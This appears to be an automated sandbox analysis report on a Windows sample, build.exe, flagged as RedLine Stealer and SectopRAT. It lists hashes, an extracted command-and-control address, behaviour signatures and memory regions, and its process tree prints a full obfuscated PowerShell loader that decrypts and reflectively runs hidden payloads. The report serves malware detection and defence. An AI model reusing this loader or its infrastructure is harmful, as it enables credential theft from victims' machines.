Analysis
-
max time kernel
195s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
05-05-2024 18:01
Static task
static1
Behavioral task
behavioral1
Sample
build.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
build.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
build.exe
Resource
win11-20240419-en
General
-
Target
build.exe
-
Size
351KB
-
MD5
e00381635f0deee1380080b322aec301
-
SHA1
751c7ac25d1cbd1a789bea64f46bb226d9cd43e1
-
SHA256
18c790568c6e0e30d600135a33a9e41ff55e076600fec006772d95849abc4def
-
SHA512
f401016e001ffad5e731c6afb333acd3124dd8c9d2187b06cc38a4094cb2e67bfd5b8a732587df92ab34bd4902b94cdc5ab5aeb413af857777fb5e5fd13b62a3
-
SSDEEP
6144:Vkup0yN90QEsvxUDJchSJrcu78hp1mQlZDJ0ML:Wy900WDJLJrtKp1mGRJ0g
Malware Config
Extracted
redline
cheat
ii-restored.gl.at.ply.gg:43416
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp family_sectoprat -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 3 4868 powershell.exe 5 4868 powershell.exe 7 4868 powershell.exe 8 4868 powershell.exe 9 4868 powershell.exe 11 4868 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
build.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" build.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4868 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
build.execmd.exedescription pid process target process PID 1900 wrote to memory of 5088 1900 build.exe cmd.exe PID 1900 wrote to memory of 5088 1900 build.exe cmd.exe PID 5088 wrote to memory of 4868 5088 cmd.exe powershell.exe PID 5088 wrote to memory of 4868 5088 cmd.exe powershell.exe PID 5088 wrote to memory of 4868 5088 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c "build.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('imoYPv8IKhFzZbUQGc9tLwtVTdE/LpsrhzYrOXefWdo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g+kpXPmwAsGMTyt1EM/xyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tjyzH=New-Object System.IO.MemoryStream(,$param_var); $xDXZb=New-Object System.IO.MemoryStream; $QPesd=New-Object System.IO.Compression.GZipStream($tjyzH, [IO.Compression.CompressionMode]::Decompress); $QPesd.CopyTo($xDXZb); $QPesd.Dispose(); $tjyzH.Dispose(); $xDXZb.Dispose(); $xDXZb.ToArray();}function execute_function($param_var,$param2_var){ $hVNQH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKjxO=$hVNQH.EntryPoint; $uKjxO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$rMjrX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($NJxiO in $rMjrX) { if ($NJxiO.StartsWith(':: ')) { $kXTzm=$NJxiO.Substring(3); break; }}$payloads_var=[string[]]$kXTzm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.batFilesize
276KB
MD5717c25dae776217fbc92897c79fb72b2
SHA1c3d1bbe2b559c0c18423b80bee499f0d23b3b477
SHA2568c3def6d2728ca908b96df1ee12de65b03ca1e4975bbc65813154b846058b949
SHA5124f9a1a953951cbd0cf112939d973fde0dbaff92a4a2149e619ba39998c379ff62d01c6af03005a2c03831d0d989303a7bf3c0c12ba1b3bf85d1b90ab05dd264d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_at5kko5t.gqk.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\tmpF05.tmpFilesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\Local\Temp\tmpF1A.tmpFilesize
92KB
MD555d8864e58f075cbe2dbd43a1b2908a9
SHA10d7129d95fa2ddb7fde828b22441dc53dffc5594
SHA256e4e07f45a83a87aff5e7f99528464abaad495499e9e2e3e0fcd5897819f88581
SHA51289ce123d2685448826f76dce25292b2d2d525efd8b78fd9235d1e357ad7ae2d4b3461ef903e2994cd2b8e28f56b0cc50137dd90accdd3f281472e488f6c7cf2e
-
C:\Users\Admin\AppData\Local\Temp\tmpFC3.tmpFilesize
96KB
MD5d367ddfda80fdcf578726bc3b0bc3e3c
SHA123fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA2560b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA51240e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77
-
memory/4868-39-0x0000000008B10000-0x0000000008B46000-memory.dmpFilesize
216KB
-
memory/4868-47-0x0000000008FC0000-0x0000000008FFE000-memory.dmpFilesize
248KB
-
memory/4868-13-0x0000000006D70000-0x0000000006DD6000-memory.dmpFilesize
408KB
-
memory/4868-14-0x0000000007440000-0x00000000074A6000-memory.dmpFilesize
408KB
-
memory/4868-15-0x0000000007620000-0x0000000007970000-memory.dmpFilesize
3.3MB
-
memory/4868-18-0x00000000074B0000-0x00000000074CC000-memory.dmpFilesize
112KB
-
memory/4868-19-0x0000000007AB0000-0x0000000007AFB000-memory.dmpFilesize
300KB
-
memory/4868-20-0x0000000007CD0000-0x0000000007D46000-memory.dmpFilesize
472KB
-
memory/4868-11-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB
-
memory/4868-31-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB
-
memory/4868-36-0x0000000009520000-0x0000000009B98000-memory.dmpFilesize
6.5MB
-
memory/4868-37-0x0000000008A90000-0x0000000008AAA000-memory.dmpFilesize
104KB
-
memory/4868-38-0x0000000008AD0000-0x0000000008AD8000-memory.dmpFilesize
32KB
-
memory/4868-9-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB
-
memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmpFilesize
120KB
-
memory/4868-45-0x000000000A1B0000-0x000000000A7B6000-memory.dmpFilesize
6.0MB
-
memory/4868-46-0x0000000008F60000-0x0000000008F72000-memory.dmpFilesize
72KB
-
memory/4868-12-0x0000000006CD0000-0x0000000006CF2000-memory.dmpFilesize
136KB
-
memory/4868-48-0x0000000009140000-0x000000000924A000-memory.dmpFilesize
1.0MB
-
memory/4868-74-0x0000000073B2E000-0x0000000073B2F000-memory.dmpFilesize
4KB
-
memory/4868-75-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB
-
memory/4868-84-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB
-
memory/4868-99-0x0000000009D70000-0x0000000009F32000-memory.dmpFilesize
1.8MB
-
memory/4868-100-0x000000000ACF0000-0x000000000B21C000-memory.dmpFilesize
5.2MB
-
memory/4868-101-0x000000000B220000-0x000000000B71E000-memory.dmpFilesize
5.0MB
-
memory/4868-242-0x0000000009BA0000-0x0000000009C32000-memory.dmpFilesize
584KB
-
memory/4868-243-0x0000000007DF0000-0x0000000007E0E000-memory.dmpFilesize
120KB
-
memory/4868-244-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB
-
memory/4868-251-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB
-
memory/4868-10-0x0000000006E10000-0x0000000007438000-memory.dmpFilesize
6.2MB
-
memory/4868-8-0x00000000067A0000-0x00000000067D6000-memory.dmpFilesize
216KB
-
memory/4868-5-0x0000000073B2E000-0x0000000073B2F000-memory.dmpFilesize
4KB
-
memory/4868-440-0x0000000073B20000-0x000000007420E000-memory.dmpFilesize
6.9MB